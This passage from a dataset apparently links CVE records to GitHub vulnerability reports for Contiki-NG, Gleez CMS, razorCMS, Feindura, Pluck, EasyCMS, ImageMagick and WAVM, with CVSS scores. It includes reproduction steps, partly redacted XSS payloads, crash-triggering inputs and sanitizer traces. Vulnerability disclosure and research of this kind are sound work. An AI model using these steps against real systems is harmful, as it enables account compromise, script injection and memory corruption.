NUMBERTAG f NUMBERTAG d NUMBERTAG e NUMBERTAG in __asan_memmove ( PATHTAG NUMBERTAG in lvm_shift_for_operator PATHTAG NUMBERTAG a in parse_expr PATHTAG NUMBERTAG in parse_expr PATHTAG NUMBERTAG a4 in parse_comparison PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_where PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f NUMBERTAG ccca NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'p' defined in 'aql APITAG NUMBERTAG c0a0) of size NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'vmcode' defined in 'aql APITAG NUMBERTAG c NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow NUMBERTAG asan_memmove Shadow bytes around the buggy address NUMBERTAG bb7c NUMBERTAG bb7d NUMBERTAG bb7e NUMBERTAG bb7f NUMBERTAG bb NUMBERTAG bb NUMBERTAG f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24982. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
  24983. "severity": "MEDIUM",
  24984. "baseScore": 6.1,
  24985. "impactScore": 4.2,
  24986. "exploitabilityScore": 1.8
  24987. },
  24988. {
  24989. "CVE_ID": "CVE-2018-16666",
  24990. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/595",
  24991. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/595",
  24992. "Repo_new": "contiki-ng/contiki-ng",
  24993. "Issue_Created_At": "2018-07-09T14:57:37Z",
  24994. "description": "Stack based buffer overflow while parsing AQL (parsing next string). Function next_string that provides next string during AQL parsing tries to memcpy input data (part of AQL files) into fixed size buffer. Allocated buffer can fit only DB_MAX_ELEMENT_SIZE NUMBERTAG bytes and the check is missing. Crashing line: aql APITAG Declaration of buffer: APITAG typedef char value_t[DB_MAX_ELEMENT_SIZE]; APITAG define DB_MAX_ELEMENT_SIZE NUMBERTAG APITAG value_t value; aql APITAG NUMBERTAG int lexer_start(lexer_t lexer, char input, token_t token, value_t value) { lexer >input = input; lexer >prev_pos = input; lexer >token = token; lexer >value = value; Overflow: aql APITAG memcpy(lexer >value, s, length); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Following AQL code will trigger crash APITAG SELECT APITAG Mitigation : The size of input string should be limited to DB_MAX_ELEMENT_SIZE. Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): URLTAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd5e7b NUMBERTAG f0 at pc NUMBERTAG fb NUMBERTAG bp NUMBERTAG ffd5e7b NUMBERTAG d0 sp NUMBERTAG ffd5e7b NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd5e7b NUMBERTAG f0 thread T NUMBERTAG fb NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG in next_string PATHTAG NUMBERTAG in lexer_next PATHTAG NUMBERTAG d NUMBERTAG in parse_aggregator PATHTAG NUMBERTAG d NUMBERTAG in parse_attributes PATHTAG NUMBERTAG ERRORTAG NUMBERTAG a4 in parse_attributes PATHTAG NUMBERTAG ERRORTAG NUMBERTAG a4 in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG fb NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd5e7b NUMBERTAG f0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in aql_parse PATHTAG This frame has NUMBERTAG object(s NUMBERTAG token NUMBERTAG le NUMBERTAG name NUMBERTAG alue' APITAG NUMBERTAG bceea NUMBERTAG f2 f2 f2 f NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f NUMBERTAG bceea NUMBERTAG f3 f3 f3 f NUMBERTAG f1 f1 f1 f NUMBERTAG bceea NUMBERTAG bceeaa NUMBERTAG bceeab NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG bceeac NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24995. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24996. "severity": "HIGH",
  24997. "baseScore": 7.8,
  24998. "impactScore": 5.9,
  24999. "exploitabilityScore": 1.8
  25000. },
  25001. {
  25002. "CVE_ID": "CVE-2018-16667",
  25003. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/597",
  25004. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/597",
  25005. "Repo_new": "contiki-ng/contiki-ng",
  25006. "Issue_Created_At": "2018-07-09T15:08:31Z",
  25007. "description": "Global buffer overflow while parsing AQL (lvm_register_variable, lvm_set_variable_value, create_intersection, create_union). Functions APITAG APITAG APITAG APITAG write data into global fixed size buffers named variables and derivations making off by one error. Additionally functions APITAG APITAG APITAG (only in DEBUG mode), APITAG read the data from buffers variables and derivations making similar off by one error. Buffers are declared as: APITAG static variable_t variables[LVM_MAX_VARIABLE_ID NUMBERTAG APITAG static derivation_t APITAG NUMBERTAG Sample usage: APITAG for(var = variables; var APITAG name NUMBERTAG ar++) { Following AQL code samples will trigger crash: SELECT NUMBERTAG FROM NUMBERTAG WHERE NUMBERTAG This could potentially lead to Remote Code Execution, but attack is more difficult, because buffer is stored in global data segment APITAG APITAG The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG high) Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG bp NUMBERTAG fff5f NUMBERTAG b0 sp NUMBERTAG fff5f NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG in lookup PATHTAG NUMBERTAG in lvm_register_variable PATHTAG NUMBERTAG db in parse_operand PATHTAG NUMBERTAG db in parse_expr PATHTAG NUMBERTAG a4 in parse_comparison PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_where PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f NUMBERTAG bbeb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'global_data_size' defined in APITAG NUMBERTAG c NUMBERTAG of size NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'variables' defined in APITAG NUMBERTAG c1e0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG lookup Shadow bytes around the buggy address NUMBERTAG bb7f NUMBERTAG bb NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9[f9]f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG bb NUMBERTAG bb NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  25008. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  25009. "severity": "HIGH",
  25010. "baseScore": 7.0,
  25011. "impactScore": 5.9,
  25012. "exploitabilityScore": 1.0
  25013. },
  25014. {
  25015. "CVE_ID": "CVE-2018-16703",
  25016. "Issue_Url_old": "https://github.com/gleez/cms/issues/802",
  25017. "Issue_Url_new": "https://github.com/gleez/cms/issues/802",
  25018. "Repo_new": "gleez/cms",
  25019. "Issue_Created_At": "2018-09-07T12:40:51Z",
  25020. "description": "Unauthenticated user enumeration and Possible account brute force leading to account compromise. Description : A vulnerability in the Gleez CMS login page could allow an unauthenticated, remote attacker to perform multiple user enumeration, which can further help attacker to perform login attempts in excess of the configured login attempt limit. The vulnerability is due to insufficient server side access control and login attempt limit enforcement. An attacker could exploit this vulnerability by sending modified login attempts to the Portal login page. An exploit could allow the attacker to identify existing users and perform brute force password attacks on the Portal. Proof of concept : Any unauthenticated user can perform user enumeration by changing id in the below URL. URLTAG This can help user to identify the user names registered on the CMS portal. Since there is account lockout implement, the brute force attempt can be successfully executed. Also, there is no password complexity or strength defined while creating account, which means passwords of significantly smaller length could be set, which makes it easy for the attacker. Version : Gleez CMS NUMBERTAG Impact : This can lead to confidentiality impact and potential account compromise.",
  25021. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  25022. "severity": "MEDIUM",
  25023. "baseScore": 5.3,
  25024. "impactScore": 1.4,
  25025. "exploitabilityScore": 3.9
  25026. },
  25027. {
  25028. "CVE_ID": "CVE-2018-16704",
  25029. "Issue_Url_old": "https://github.com/gleez/cms/issues/801",
  25030. "Issue_Url_new": "https://github.com/gleez/cms/issues/801",
  25031. "Repo_new": "gleez/cms",
  25032. "Issue_Created_At": "2018-09-07T10:54:59Z",
  25033. "description": "Insecure Direct Object Reference View other user profiles. Description : Observed IDOR vulnerability in demo site FILETAG It will be possible attackers(logged in user) to view profile page of other users. Version : Gleez CMS NUMBERTAG ulnerability type: Insecure Direct Object Reference Steps to reproduce NUMBERTAG Login as a demo user Username : demo Password : demo NUMBERTAG After login, you can observe the URL URLTAG in the address bar NUMBERTAG Change the user ID, from NUMBERTAG to NUMBERTAG You be will be able to view other user name and their profile page. Impact The vulnerability if exploited can allow users to view profile of any other user which the user is not entitled to. The attacker can view the following NUMBERTAG Username NUMBERTAG Profile photo NUMBERTAG Last visited date NUMBERTAG Joined date NUMBERTAG Number of visits",
  25034. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  25035. "severity": "MEDIUM",
  25036. "baseScore": 4.3,
  25037. "impactScore": 1.4,
  25038. "exploitabilityScore": 2.8
  25039. },
  25040. {
  25041. "CVE_ID": "CVE-2018-16726",
  25042. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/52",
  25043. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/52",
  25044. "Repo_new": "smiffy6969/razorCMS",
  25045. "Issue_Created_At": "2018-08-16T10:38:26Z",
  25046. "description": "HTML injection found. \u2022 APITAG version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ULNERABILTY TYPE: HTML injection. VULNERABILITY DESCRIPTION: HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. This vulnerability occurs when the user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) the legit from the malicious parts and consequently will parse and execute all as legit in the victim context. There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. Malicious HTML code could be injected for example via APITAG that is used to render user inserted HTML code. If strings are not correctly sanitized the problem could lead to XSS based HTML injection. Another method could be APITAG Steps to reproduce NUMBERTAG Login to APITAG NUMBERTAG Go to setting and Edit the Homepage NUMBERTAG In the description, parameter insert the malicious HTML payload \"> APITAG youare hacked by a malicious hacker APITAG NUMBERTAG Save the page details NUMBERTAG Go to the homepage and refresh the browser, you will see the malicious content displayed on the browser. Proof of concept: Vulnerable URL: URLTAG Vulnerable Parameter: Description Malicious payload: \"> APITAG you are hacked by a malicious hacker APITAG NUMBERTAG enter the malicious payload \"> APITAG you are hacked by a malicious hacker APITAG into the description parameter. FILETAG NUMBERTAG After saving the details return to the homepage and refresh the browser, you will get that malicious HTML payload displayed on the browser. Submitted by: Ritesh kumar Reference: URLTAG",
  25047. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25048. "severity": "MEDIUM",
  25049. "baseScore": 5.4,
  25050. "impactScore": 2.7,
  25051. "exploitabilityScore": 2.3
  25052. },
  25053. {
  25054. "CVE_ID": "CVE-2018-16727",
  25055. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/51",
  25056. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/51",
  25057. "Repo_new": "smiffy6969/razorCMS",
  25058. "Issue_Created_At": "2018-08-15T11:50:53Z",
  25059. "description": "Stored Cross site Scripting (XSS) found.. \u2022 APITAG version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ulnerability type: Cross site scripting(XSS) Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user\u2019s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second order XSS. This vulnerability can be used to conduct a number of browser based attacks including: Hijacking another user's browser Capturing sensitive information viewed by application users Pseudo defacement of the application Port scanning of internal hosts (\"internal\" in relation to the users of the web application) Directed delivery of browser based exploits Other malicious activities Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario: Attacker stores malicious code into the vulnerable page The user authenticates in the application User visits the vulnerable page Malicious code is executed by the user's browser This type of attack can also be exploited with browser exploitation frameworks such as APITAG XSS Proxy and Backframe. These frameworks allow for complex APITAG exploit development. Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens. STEPS TO REPRODUCE NUMBERTAG Login to APITAG NUMBERTAG Go to setting and Edit the Homepage NUMBERTAG In the keywords parameter enter the malicious XSS script APITAG \"> APITAG and enter some text in description parameter and save the page details NUMBERTAG Go to the homepage and either refresh the browser or refresh the home page, the malicious javascript will prompt on the browser. Proof Of Concept: Vulnerable URL: URLTAG Vulnerable parameter: Keywords Malicious XSS payload: APITAG \"> APITAG Vulnerable source code: FILETAG NUMBERTAG Go for editing the homepage and enter XSS payload APITAG \"> APITAG in Keywords field, enter some text in description part and save the page details. FILETAG NUMBERTAG After saving go to home page and either refresh the page or click on home, the malicious payload will be prompted on the browser. FILETAG Submitted by: Ritesh Kumar Reference: URLTAG URLTAG",
  25060. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25061. "severity": "MEDIUM",
  25062. "baseScore": 5.4,
  25063. "impactScore": 2.7,
  25064. "exploitabilityScore": 2.3
  25065. },
  25066. {
  25067. "CVE_ID": "CVE-2018-16728",
  25068. "Issue_Url_old": "https://github.com/frozeman/feindura-flat-file-cms/issues/29",
  25069. "Issue_Url_new": "https://github.com/frozeman/feindura-flat-file-cms/issues/29",
  25070. "Repo_new": "frozeman/feindura-flat-file-cms",
  25071. "Issue_Created_At": "2018-08-15T10:59:46Z",
  25072. "description": "Reflected cross site scripting found (XSS). \u2022 Fiendura version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ULNERABILITY TYPE: cross site scripting. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. STEPS TO REPRODUCE NUMBERTAG login in Fiendura NUMBERTAG Go for creating a new page by clicking on the new page NUMBERTAG In the tags parameter, type the malicious javascript APITAG \"> APITAG NUMBERTAG The malicious javascript will be reflected in the browser. PROOF OF CONCEPT: Vulnerable URL: URLTAG Vulnerable parameter: Tags Malicious script: APITAG \"> APITAG NUMBERTAG enter the malicious javascript in the Tags parameter. FILETAG NUMBERTAG after entering the payload an XSS prompt will be reflected on the browser. FILETAG Submitted: Ritesh Kumar Reference: URLTAG",
  25073. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25074. "severity": "MEDIUM",
  25075. "baseScore": 5.4,
  25076. "impactScore": 2.7,
  25077. "exploitabilityScore": 2.3
  25078. },
  25079. {
  25080. "CVE_ID": "CVE-2018-16729",
  25081. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/63",
  25082. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/63",
  25083. "Repo_new": "pluck-cms/pluck",
  25084. "Issue_Created_At": "2018-08-12T16:14:36Z",
  25085. "description": "XSS via svg fileupload : Pluck NUMBERTAG Affected software: Pluck NUMBERTAG Author: Ritesh kumar Description: SVG files can contain Javascript in APITAG tags. Browsers are smart enough to ignore scripts embedded in SVG files included via IMG tags. However, a direct request for an SVG file will result in the scripts being executed. So an embedded SVG as an attachment in an issue or avatar does not execute the code, but if a user clicks on the attachment the code will execute. Steps to reproduce NUMBERTAG login to pluck NUMBERTAG click on pages >manage files then browse and upload an malicious svg file which contain xss payload NUMBERTAG Now open that file which was saved as xss.svg the below output will be shown. URL Where XSS got executed FILETAG FILETAG Vulnerable url: URLTAG",
  25086. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25087. "severity": "MEDIUM",
  25088. "baseScore": 5.4,
  25089. "impactScore": 2.7,
  25090. "exploitabilityScore": 2.3
  25091. },
  25092. {
  25093. "CVE_ID": "CVE-2018-16749",
  25094. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1119",
  25095. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1119",
  25096. "Repo_new": "imagemagick/imagemagick",
  25097. "Issue_Created_At": "2018-05-01T22:12:58Z",
  25098. "description": "APITAG assertion failed. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Assertion fail in APITAG . APITAG Found with a modified version of the kAFL fuzzer ( URLTAG Credits: Sergej Schumilo, Cornelius Aschermann APITAG Universit\u00e4t Bochum) Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: APITAG",
  25099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25100. "severity": "MEDIUM",
  25101. "baseScore": 6.5,
  25102. "impactScore": 3.6,
  25103. "exploitabilityScore": 2.8
  25104. },
  25105. {
  25106. "CVE_ID": "CVE-2018-16750",
  25107. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1118",
  25108. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1118",
  25109. "Repo_new": "imagemagick/imagemagick",
  25110. "Issue_Created_At": "2018-05-01T22:09:49Z",
  25111. "description": "APITAG memory leak. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG ASAN Report: ERRORTAG Found with a modified version of the kAFL fuzzer ( URLTAG Credits: Sergej Schumilo, Cornelius Aschermann APITAG Universit\u00e4t Bochum) Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: APITAG",
  25112. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25113. "severity": "MEDIUM",
  25114. "baseScore": 6.5,
  25115. "impactScore": 3.6,
  25116. "exploitabilityScore": 2.8
  25117. },
  25118. {
  25119. "CVE_ID": "CVE-2018-16759",
  25120. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/4",
  25121. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/4",
  25122. "Repo_new": "teameasy/easycms",
  25123. "Issue_Created_At": "2018-07-25T06:11:31Z",
  25124. "description": "There is an xss vulnerability in the site search. Vulnerability file APITAG ERRORTAG $put filters XSS attacks with the APITAG function and the APITAG method is defined in the APITAG file: ERRORTAG Filtered common tags, but still not perfect, you can use some rare events to trigger xss POC APITAG APITAG FILETAG yaml POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG think_template=default; APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  25125. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25126. "severity": "MEDIUM",
  25127. "baseScore": 6.1,
  25128. "impactScore": 2.7,
  25129. "exploitabilityScore": 2.8
  25130. },
  25131. {
  25132. "CVE_ID": "CVE-2018-16764",
  25133. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/93",
  25134. "Issue_Url_new": "https://github.com/wavm/wavm/issues/93",
  25135. "Repo_new": "wavm/wavm",
  25136. "Issue_Created_At": "2018-07-26T13:02:05Z",
  25137. "description": "APITAG heap buffer overflow parsing running wasm file causing crash . Hello Reporting some possible vul MENTIONTAG Virtual Machine Vul Description: APITAG heap buffer overflow parsing running wasm file causing crash Impact Products version: the latest wavm lib git log pretty=oneline commit APITAG crash detail: APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG d NUMBERTAG a9 bp NUMBERTAG ffde NUMBERTAG sp NUMBERTAG ffde NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG d NUMBERTAG a8 in __asan_memcpy PATHTAG NUMBERTAG f4fb NUMBERTAG eb7d7 in APITAG ( PATHTAG NUMBERTAG f4fb NUMBERTAG ead in APITAG ( PATHTAG NUMBERTAG f4fb3dcc NUMBERTAG in APITAG APITAG APITAG ( PATHTAG NUMBERTAG f4fb3ee NUMBERTAG in void APITAG APITAG APITAG const ( PATHTAG NUMBERTAG f4fb3ee1cc1 in void APITAG APITAG APITAG APITAG APITAG void APITAG APITAG NUMBERTAG PATHTAG NUMBERTAG f4fb3e1d NUMBERTAG in void APITAG APITAG ( PATHTAG NUMBERTAG f4fb3dce NUMBERTAG in APITAG APITAG ( PATHTAG NUMBERTAG f4fb3dce NUMBERTAG c in APITAG APITAG ( PATHTAG NUMBERTAG in APITAG const&, APITAG ( PATHTAG NUMBERTAG in APITAG const , APITAG ( PATHTAG NUMBERTAG c in APITAG const&) ( PATHTAG NUMBERTAG a4c in main ( PATHTAG NUMBERTAG f4fafb4eb NUMBERTAG in __libc_start_main APITAG NUMBERTAG aa1 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in operator new(unsigned long) PATHTAG NUMBERTAG f4fb NUMBERTAG c1c NUMBERTAG in APITAG long, unsigned long, std::allocator APITAG const&) APITAG NUMBERTAG f4fb NUMBERTAG c NUMBERTAG in std::basic_string<char, std::char_traits APITAG , std::allocator APITAG >::basic_string(char const , std::allocator APITAG const&) APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  25138. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25139. "severity": "HIGH",
  25140. "baseScore": 8.8,
  25141. "impactScore": 5.9,
  25142. "exploitabilityScore": 2.8
  25143. },
  25144. {
  25145. "CVE_ID": "CVE-2018-16765",
  25146. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/94",
  25147. "Issue_Url_new": "https://github.com/wavm/wavm/issues/94",
  25148. "Repo_new": "wavm/wavm",
  25149. "Issue_Created_At": "2018-07-26T13:07:25Z",
  25150. "description": "APITAG heap buffer overflow when parsing running wasm file causing crash . FILETAG",
  25151. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25152. "severity": "HIGH",
  25153. "baseScore": 8.8,
  25154. "impactScore": 5.9,
  25155. "exploitabilityScore": 2.8
  25156. },
  25157. {
  25158. "CVE_ID": "CVE-2018-16766",
  25159. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/96",
  25160. "Issue_Url_new": "https://github.com/wavm/wavm/issues/96",
  25161. "Repo_new": "wavm/wavm",
  25162. "Issue_Created_At": "2018-07-26T13:09:25Z",
  25163. "description": "APITAG reached unreachable code parsing running wasm file causing crash . FILETAG",
  25164. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25165. "severity": "HIGH",
  25166. "baseScore": 8.8,
  25167. "impactScore": 5.9,
  25168. "exploitabilityScore": 2.8
  25169. },
  25170. {
  25171. "CVE_ID": "CVE-2018-16767",
  25172. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/97",
  25173. "Issue_Url_new": "https://github.com/wavm/wavm/issues/97",
  25174. "Repo_new": "wavm/wavm",
